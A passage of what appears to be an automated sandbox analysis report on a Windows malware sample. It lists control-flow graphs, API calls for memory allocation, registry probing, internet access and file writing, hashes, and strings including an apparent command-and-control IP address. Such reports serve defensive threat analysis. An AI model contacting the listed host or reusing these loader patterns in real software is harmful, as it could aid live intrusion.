789 49507e2 783->789 790 4950556-495056b 784->790 791 49505e0-49505ef 784->791 792 495067a-4950689 785->792 787->786 788->778 789->782 794 495056d 790->794 795 495056f-495057a 790->795 791->764 796 4950750-495077a 792->796 797 495068f-49506b2 792->797 793->774 798 495083e-4950847 793->798 794->791 800 495057c-4950599 795->800 801 495059b-49505bb 795->801 796->777 802 49506b4-49506ed 797->802 803 49506ef-49506fc 797->803 804 4950849 798->804 805 495084b-495086c 798->805 812 49505bd-49505db 800->812 801->812 802->803 806 49506fe-4950748 803->806 807 495074b 803->807 804->774 805->793 806->807 807->792 812->784
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0495024D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: cess$kernel32.dll
                        • API String ID: 4275171209-1230238691
                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction ID: e66cd634b46ade7cedf94661ff97dd16c42cd12a520f0e41bcf94499f40e58ad
                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction Fuzzy Hash: F2526D74A01229DFDB64CF58C985BACBBB5BF09304F1480E9E94DA7361DB30AA85DF14
                        Function 00405A50 Relevance: 11.2, APIs: 2, Strings: 5, Instructions: 678sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 813 405a50-406330 call 410822 call 4106e2 Sleep call 402760 * 2 call 403ab0 call 408ed0 call 408d80 * 3 call 406c40 call 408920 call 402460 call 408a70 call 402390 call 406ee0 call 4088e0 call 402460 call 408a70 call 402390 861 406404-40642f call 407290 call 4088e0 call 402460 call 408a70 call 402390 813->861 862 406336-4063ad call 406f60 call 4088e0 call 402460 call 4023e0 call 402390 call 406ff0 call 408900 call 402460 call 4023e0 call 402390 call 407070 call 408940 call 402460 call 408a70 call 402390 813->862 884 4064f3-40651e call 407630 call 4088c0 call 402460 call 408a70 call 402390 861->884 885 406435-4064ac call 407310 call 4088e0 call 402460 call 4023e0 call 402390 call 407390 call 408900 call 402460 call 4023e0 call 402390 call 407410 call 408940 call 402460 call 408a70 call 402390 861->885 954 4063cc-4063f7 call 407180 call 408940 call 402460 call 408a70 call 402390 862->954 955 4063af call 407100 862->955 918 406524-4065c1 call 4076b0 call 408920 call 402460 call 4023e0 call 402390 call 407730 call 408900 call 402460 call 4023e0 call 402390 call 4077b0 call 4088c0 call 402460 call 4023e0 call 402390 call 407830 call 4089c0 call 402460 call 408a70 call 402390 884->918 919 406608-406633 call 407a50 call 408890 call 402460 call 408a70 call 402390 884->919 1019 4064b8-4064e3 call 407520 call 408940 call 402460 call 408a70 call 402390 885->1019 1020 4064ae-4064b3 call 4074a0 885->1020 1147 4065c3-4065c8 call 4078c0 918->1147 1148 4065cd-4065f8 call 407940 call 4089c0 call 402460 call 408a70 call 402390 918->1148 962 4066b3-4066de call 407c70 call 408940 call 402460 call 408a70 call 402390 919->962 963 406635-4066ae call 407ae0 call 408900 call 402460 call 4023e0 call 402390 call 407b60 call 408940 call 402460 call 4023e0 call 402390 call 407bf0 call 4088c0 call 402460 call 4023e0 call 402390 919->963 1016 40687d-4069df call 4017a0 call 4083f0 call 408940 call 402460 call 408370 call 408920 call 402460 call 4082d0 call 4089a0 call 402460 call 408da0 call 408e00 call 408eb0 call 408e00 call 408eb0 call 408e00 call 402390 * 8 954->1016 1022 4063fd-406402 call 407210 954->1022 967 4063b4-4063c7 call 408920 call 402460 955->967 1033 4066e0-406759 call 407d00 call 408900 call 402460 call 4023e0 call 402390 call 407d80 call 408920 call 402460 call 4023e0 call 402390 call 407e00 call 4088c0 call 402460 call 4023e0 call 402390 962->1033 1034 40675e-406789 call 407e80 call 408970 call 402460 call 408a70 call 402390 962->1034 963->1016 993 40686f-406878 call 4023e0 call 402390 967->993 993->1016 1251 4069e5-4069fe call 402350 call 4021d0 1016->1251 1019->1016 1091 4064e9-4064ee call 4075b0 1019->1091 1020->967 1022->967 1033->1016 1099 40678b-4067dc call 407f10 call 408900 call 402460 call 4023e0 call 402390 call 407fd0 call 4088c0 call 402460 call 4023e0 call 402390 call 408050 1034->1099 1100 4067de-406809 call 4080d0 call 4088c0 call 402460 call 408a70 call 402390 1034->1100 1091->884 1224 40685c-40686c call 4088c0 call 402460 1099->1224 1100->1016 1167 40680b-406857 call 408150 call 408900 call 402460 call 4023e0 call 402390 call 4081d0 call 408920 call 402460 call 4023e0 call 402390 call 408250 1100->1167 1147->1148 1148->1016 1206 4065fe-406603 call 4079d0 1148->1206 1167->1224 1206->919 1224->993 1256 406a00-406a23 call 402210 call 402460 call 4025e0 1251->1256 1257 406a3e-406a45 Sleep 1251->1257 1256->1257 1264 406a47-406a9c call 402390 call 408c80 * 3 call 404f70 1256->1264 1257->1251
                        APIs
                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,B6DBD0D4), ref: 00410837
                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: 185.156.72.65$185.156.72.65$SUB=$get$u%
                        • API String ID: 2563648476-311857291
                        • Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                        • Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
                        • Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                        • Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9
                        Function 00401E50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1274 401e50-401e9e 1275 401ea0-401ea5 1274->1275 1275->1275 1276 401ea7-402179 call 402760 * 2 call 40aff0 call 40d0f0 InternetOpenA 1275->1276 1289 4021a3-4021c0 call 409a17 1276->1289 1290 40217b-402187 1276->1290 1292 402199-4021a0 call 409b7c 1290->1292 1293 402189-402197 1290->1293 1292->1289 1293->1292 1294 4021c8-4021f9 call 40cfef call 401e50 1293->1294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: http://
                        • API String ID: 0-1121587658
                        • Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                        • Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
                        • Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                        • Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94
                        Function 006017C8 Relevance: 4.7, APIs: 3, Instructions: 156registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1303 6017c8-6017cc 1304 601824-60251a 1303->1304 1305 6017ce-6035e4 1303->1305 1310 6037e2-603932 1304->1310 1305->1310 1311 603a88-604021 1305->1311 1315 605ba6-605bce 1310->1315 1311->1315 1317 605bd0-605beb RegOpenKeyA 1315->1317 1318 605bf7-605c12 RegOpenKeyA 1315->1318 1317->1318 1319 605bed 1317->1319 1320 605c14-605c1e 1318->1320 1321 605c2a-605c56 1318->1321 1319->1318 1320->1321 1324 605c63-605c6d 1321->1324 1325 605c58-605c61 GetNativeSystemInfo 1321->1325 1326 605c79-605c87 1324->1326 1327 605c6f 1324->1327 1325->1324 1329 605c93-605c9a 1326->1329 1330 605c89 1326->1330 1327->1326 1331 605ca0-605ca7 1329->1331 1332 605cad 1329->1332 1330->1329 1331->1332 1333 605e52-605e59 1331->1333 1332->1332 1334 6064c0-6064eb 1333->1334 1335 605e5f-606354 1333->1335 1335->1334
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00605BE3
                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00605C0A
                        • GetNativeSystemInfo.KERNEL32(?), ref: 00605C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5fd000_file.jbxd
                        Similarity
                        • API ID: Open$InfoNativeSystem
                        • String ID:
                        • API String ID: 1247124224-0
                        • Opcode ID: 126974285bf53a6cf9378d69875b4aa7f342bf65ad0f1b9c4238088f817c737d
                        • Instruction ID: 46dc649a0bceac164dde6f7b5a18cfdc3ce1085383846ce616bff950060586d0
                        • Opcode Fuzzy Hash: 126974285bf53a6cf9378d69875b4aa7f342bf65ad0f1b9c4238088f817c737d
                        • Instruction Fuzzy Hash: 0551F6B244820DDFEB19DF14CC04BEF37AAEF05310F14052AE98282A80E7764DA5CF59
                        Function 00601ED3 Relevance: 4.6, APIs: 3, Instructions: 87registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1339 601ed3-605bce 1347 605bd0-605beb RegOpenKeyA 1339->1347 1348 605bf7-605c12 RegOpenKeyA 1339->1348 1347->1348 1349 605bed 1347->1349 1350 605c14-605c1e 1348->1350 1351 605c2a-605c56 1348->1351 1349->1348 1350->1351 1354 605c63-605c6d 1351->1354 1355 605c58-605c61 GetNativeSystemInfo 1351->1355 1356 605c79-605c87 1354->1356 1357 605c6f 1354->1357 1355->1354 1359 605c93-605c9a 1356->1359 1360 605c89 1356->1360 1357->1356 1361 605ca0-605ca7 1359->1361 1362 605cad 1359->1362 1360->1359 1361->1362 1363 605e52-605e59 1361->1363 1362->1362 1364 6064c0-6064eb 1363->1364 1365 605e5f-606354 1363->1365 1365->1364
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00605BE3
                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00605C0A
                        • GetNativeSystemInfo.KERNEL32(?), ref: 00605C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5fd000_file.jbxd
                        Similarity
                        • API ID: Open$InfoNativeSystem
                        • String ID:
                        • API String ID: 1247124224-0
                        • Opcode ID: 2cab6c5c11033bb00550e2d19be6737cd31119453f72ecf5981b35005120bc23
                        • Instruction ID: 8974b7a266df7595267ed920b7f3a4c2730123d7b10549bebf7413c083ffffb7
                        • Opcode Fuzzy Hash: 2cab6c5c11033bb00550e2d19be6737cd31119453f72ecf5981b35005120bc23
                        • Instruction Fuzzy Hash: DA316A7104820E9FEF15DF60C848BEF3BA5EB04314F04052AE98286E80E7B65DA4CF19
                        Function 00602506 Relevance: 4.6, APIs: 3, Instructions: 84registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1369 602506-605bce 1376 605bd0-605beb RegOpenKeyA 1369->1376 1377 605bf7-605c12 RegOpenKeyA 1369->1377 1376->1377 1378 605bed 1376->1378 1379 605c14-605c1e 1377->1379 1380 605c2a-605c56 1377->1380 1378->1377 1379->1380 1383 605c63-605c6d 1380->1383 1384 605c58-605c61 GetNativeSystemInfo 1380->1384 1385 605c79-605c87 1383->1385 1386 605c6f 1383->1386 1384->1383 1388 605c93-605c9a 1385->1388 1389 605c89 1385->1389 1386->1385 1390 605ca0-605ca7 1388->1390 1391 605cad 1388->1391 1389->1388 1390->1391 1392 605e52-605e59 1390->1392 1391->1391 1393 6064c0-6064eb 1392->1393 1394 605e5f-606354 1392->1394 1394->1393
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00605BE3
                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00605C0A
                        • GetNativeSystemInfo.KERNEL32(?), ref: 00605C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5fd000_file.jbxd
                        Similarity
                        • API ID: Open$InfoNativeSystem
                        • String ID:
                        • API String ID: 1247124224-0
                        • Opcode ID: acea70cf3085f7ea49b844e4788ce6c6253513819e1b8e10571ac77f8415e5fc
                        • Instruction ID: ca964e0847c40cd7bdbe4670d0a9e8578ade5cc6e4eabee7ffcb0508820cae08
                        • Opcode Fuzzy Hash: acea70cf3085f7ea49b844e4788ce6c6253513819e1b8e10571ac77f8415e5fc
                        • Instruction Fuzzy Hash: 5131597114464E9FEF15DF10C848BEF3BA5EB05314F04052AE98686A80E7B65DA4CF19
                        Function 006037DC Relevance: 4.6, APIs: 3, Instructions: 76registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1398 6037dc-605bce 1403 605bd0-605beb RegOpenKeyA 1398->1403 1404 605bf7-605c12 RegOpenKeyA 1398->1404 1403->1404 1405 605bed 1403->1405 1406 605c14-605c1e 1404->1406 1407 605c2a-605c56 1404->1407 1405->1404 1406->1407 1410 605c63-605c6d 1407->1410 1411 605c58-605c61 GetNativeSystemInfo 1407->1411 1412 605c79-605c87 1410->1412 1413 605c6f 1410->1413 1411->1410 1415 605c93-605c9a 1412->1415 1416 605c89 1412->1416 1413->1412 1417 605ca0-605ca7 1415->1417 1418 605cad 1415->1418 1416->1415 1417->1418 1419 605e52-605e59 1417->1419 1418->1418 1420 6064c0-6064eb 1419->1420 1421 605e5f-606354 1419->1421 1421->1420
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00605BE3
                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00605C0A
                        • GetNativeSystemInfo.KERNEL32(?), ref: 00605C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5fd000_file.jbxd
                        Similarity
                        • API ID: Open$InfoNativeSystem
                        • String ID:
                        • API String ID: 1247124224-0
                        • Opcode ID: ef415999d057c81166f5349737c17c6bf3d3dec29ab0774dce9ad2b699b419f3
                        • Instruction ID: 3fe424c16b388232343b2f5ef2775add5c1af128de4ef45e8d2c38b966d17dde
                        • Opcode Fuzzy Hash: ef415999d057c81166f5349737c17c6bf3d3dec29ab0774dce9ad2b699b419f3
                        • Instruction Fuzzy Hash: B831687114424E9FEF25DF20C848BEF3BA5FB04314F04062AE94286E80E7BA4DA5CF19
                        Function 006038B0 Relevance: 4.6, APIs: 3, Instructions: 75registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1425 6038b0-6038ba 1426 6038bc 1425->1426 1427 60390d-605bce 1425->1427 1426->1427 1430 605bd0-605beb RegOpenKeyA 1427->1430 1431 605bf7-605c12 RegOpenKeyA 1427->1431 1430->1431 1432 605bed 1430->1432 1433 605c14-605c1e 1431->1433 1434 605c2a-605c56 1431->1434 1432->1431 1433->1434 1437 605c63-605c6d 1434->1437 1438 605c58-605c61 GetNativeSystemInfo 1434->1438 1439 605c79-605c87 1437->1439 1440 605c6f 1437->1440 1438->1437 1442 605c93-605c9a 1439->1442 1443 605c89 1439->1443 1440->1439 1444 605ca0-605ca7 1442->1444 1445 605cad 1442->1445 1443->1442 1444->1445 1446 605e52-605e59 1444->1446 1445->1445 1447 6064c0-6064eb 1446->1447 1448 605e5f-606354 1446->1448 1448->1447
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00605BE3
                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00605C0A
                        • GetNativeSystemInfo.KERNEL32(?), ref: 00605C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5fd000_file.jbxd
                        Similarity
                        • API ID: Open$InfoNativeSystem
                        • String ID:
                        • API String ID: 1247124224-0
                        • Opcode ID: c325438ab5456213338aad0ebeddb6f1f1cd3ac530bdff6783ad3b89444b46b8
                        • Instruction ID: 737b333caf160b4d79d00714229a8a9d4082bbdd8e3e1848215c6e33f71a8b4d
                        • Opcode Fuzzy Hash: c325438ab5456213338aad0ebeddb6f1f1cd3ac530bdff6783ad3b89444b46b8
                        • Instruction Fuzzy Hash: D431687204424E9FEF15DF60C848BEF3BA5FB05314F04052AE94686E80E7BA5DA4CF19
                        Function 00603907 Relevance: 4.6, APIs: 3, Instructions: 72registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1452 603907-605bce 1455 605bd0-605beb RegOpenKeyA 1452->1455 1456 605bf7-605c12 RegOpenKeyA 1452->1456 1455->1456 1457 605bed 1455->1457 1458 605c14-605c1e 1456->1458 1459 605c2a-605c56 1456->1459 1457->1456 1458->1459 1462 605c63-605c6d 1459->1462 1463 605c58-605c61 GetNativeSystemInfo 1459->1463 1464 605c79-605c87 1462->1464 1465 605c6f 1462->1465 1463->1462 1467 605c93-605c9a 1464->1467 1468 605c89 1464->1468 1465->1464 1469 605ca0-605ca7 1467->1469 1470 605cad 1467->1470 1468->1467 1469->1470 1471 605e52-605e59 1469->1471 1470->1470 1472 6064c0-6064eb 1471->1472 1473 605e5f-606354 1471->1473 1473->1472
                        APIs
                        • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00605BE3
                        • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00605C0A
                        • GetNativeSystemInfo.KERNEL32(?), ref: 00605C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5fd000_file.jbxd
                        Similarity
                        • API ID: Open$InfoNativeSystem
                        • String ID:
                        • API String ID: 1247124224-0
                        • Opcode ID: aeda292b8d8e3ac820cd314ff623e770f09127daf5d97993d75fb54c8fb7087c
                        • Instruction ID: 7513e525db150b54791fe7eb7ca72551038cd62bd94dabd46179f9d68be4ca50
                        • Opcode Fuzzy Hash: aeda292b8d8e3ac820cd314ff623e770f09127daf5d97993d75fb54c8fb7087c
                        • Instruction Fuzzy Hash: 10315C7104428E9FEF16CF60C848ADF3BB5FB06304F04056AE946C6A92D7BA5DA5CF19
                        Function 00413CB9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1477 413cb9-413cc5 1478 413cf7-413d02 call 40d0dd 1477->1478 1479 413cc7-413cc9 1477->1479 1487 413d04-413d06 1478->1487 1481 413ce2-413cf3 RtlAllocateHeap 1479->1481 1482 413ccb-413ccc 1479->1482 1483 413cf5 1481->1483 1484 413cce-413cd5 call 412473 1481->1484 1482->1481 1483->1487 1484->1478 1489 413cd7-413ce0 call 4116b2 1484->1489 1489->1478 1489->1481
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: 5(@
                        • API String ID: 1279760036-4133491027
                        • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                        • Instruction ID: 6b8e07f77369cee0563c76895a616f9db891ca7c172fe53b45855655e8c042ba
                        • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                        • Instruction Fuzzy Hash: 10E0E5322002115BD6213F669C05BDB7A5C9B417A2F140137FC56F62D0EA6DCDC241ED
                        Function 04950E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1505 4950e0f-4950e24 SetErrorMode * 2 1506 4950e26 1505->1506 1507 4950e2b-4950e2c 1505->1507 1506->1507
                        APIs
                        • SetErrorMode.KERNEL32(00000400,?,?,04950223,?,?), ref: 04950E19
                        • SetErrorMode.KERNEL32(00000000,?,?,04950223,?,?), ref: 04950E1E
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction ID: 43bafc9d913032364e66eb76556220aff11c3ffb76751d3d3a00cc89f2821bfa
                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction Fuzzy Hash: 3ED0123114512877D7002A94DC0DBCD7B1CDF05B62F108021FB0DD9080C770954047E5
                        Function 007041AB Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualProtect.KERNEL32(?,0070416D,00000004), ref: 007041E8
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_703000_file.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: e365971416a22fce803c0c735a85f4f9c58e53581c361715661cd1db79a17ea1
                        • Instruction ID: 44dede731cf413af53fc9a249d49cc28fdaf6bac9b1fd89e799f5543e0e8474d
                        • Opcode Fuzzy Hash: e365971416a22fce803c0c735a85f4f9c58e53581c361715661cd1db79a17ea1
                        • Instruction Fuzzy Hash: 621104B714824AEFE305CF149D45BEE7BB6FBD1320F30452AE40157A80D37A5D2A8B68
                        Function 00704207 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualProtect.KERNEL32(?,0070416D,00000004), ref: 007041E8
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_703000_file.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: b6477aecbf4515be66977f71742ed3a356c34319b02a6bc3707399bfb88a1e12
                        • Instruction ID: 6f51b5bc6eb951b6c05215dc1b464c35aa5572d36e691920c54269edf38c34c3
                        • Opcode Fuzzy Hash: b6477aecbf4515be66977f71742ed3a356c34319b02a6bc3707399bfb88a1e12
                        • Instruction Fuzzy Hash: C111E5BA14820AEFE305CF14D904BEA77F6FFD4320F308129E50187A80D3B94D659BA8
                        Function 0070418B Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualProtect.KERNEL32(?,0070416D,00000004), ref: 007041E8
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_703000_file.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: 48e0b2244f8dff55e3ba0263227575f603970d1cc9055da8e7ad0e98a26c0f0d
                        • Instruction ID: 5a92e0cdd982874a0baafe078ea6b4794080f4b4be3ccc23266296c4d2e82632
                        • Opcode Fuzzy Hash: 48e0b2244f8dff55e3ba0263227575f603970d1cc9055da8e7ad0e98a26c0f0d
                        • Instruction Fuzzy Hash: E211C2F750810AEFE304CF04D9447AA77A5EBE4320F308119E50187A80D3798D659B64
                        Function 00601EE4 Relevance: 1.5, APIs: 1, Instructions: 18libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.00000000005FD000.00000040.00000001.01000000.00000003.sdmp, Offset: 005FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5fd000_file.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: d97f2b6fb888fb563324d9e026b97a0d555f6fe8de56eee8892d1e0d45d7be91
                        • Instruction ID: 6ec32a11454308e8e94fa3b1f2b5e02e99c8c4dc21015bfc5878110f30fb9fd7
                        • Opcode Fuzzy Hash: d97f2b6fb888fb563324d9e026b97a0d555f6fe8de56eee8892d1e0d45d7be91
                        • Instruction Fuzzy Hash: CBE0E5B154CA15DFC7082F65814563FFBF1EF80700F618C0DE0C281594D37485929B53
                        Function 047A8123 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 047A8174
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842703347.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                        • Instruction ID: b7ee4685b3560880c722a87af921d37dd854d14b97f1e34b5c59a131e3db5e88
                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                        • Instruction Fuzzy Hash: B5113C79A00208EFDB01DF98C989E98BBF5EF08350F058094F9489B361D371EA50DF81

                        Non-executed Functions

                        Function 04953FA7 Relevance: 45.6, APIs: 20, Strings: 5, Instructions: 1839sleepcomCOMMON
                        Download Yara Rule
                        APIs
                        • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04954011
                        • Sleep.KERNEL32(000003E8), ref: 049541A9
                        • __Init_thread_footer.LIBCMT ref: 0495477E
                        • __Init_thread_footer.LIBCMT ref: 04954944
                        • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04956D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04954B4E
                        • __Init_thread_footer.LIBCMT ref: 04954BDC
                        • __Init_thread_footer.LIBCMT ref: 04954E45
                        • CoInitialize.OLE32(00000000), ref: 04954EC6
                        • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04954EE1
                        • __Init_thread_footer.LIBCMT ref: 04955344
                        • Sleep.KERNEL32(00000BB8,00000000,?,04956D08,0041D8D0,0042DBDC,0042DBDD), ref: 0495555C
                        • __Init_thread_footer.LIBCMT ref: 04955652
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04956D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04954F4F
                          • Part of subcall function 04960A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04955D06,00000000,0042C014), ref: 04960A9E
                          • Part of subcall function 04960A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04960ABD
                        • __Init_thread_footer.LIBCMT ref: 049542AD
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                          • Part of subcall function 04952487: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 049524BD
                          • Part of subcall function 04952487: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 049524DE
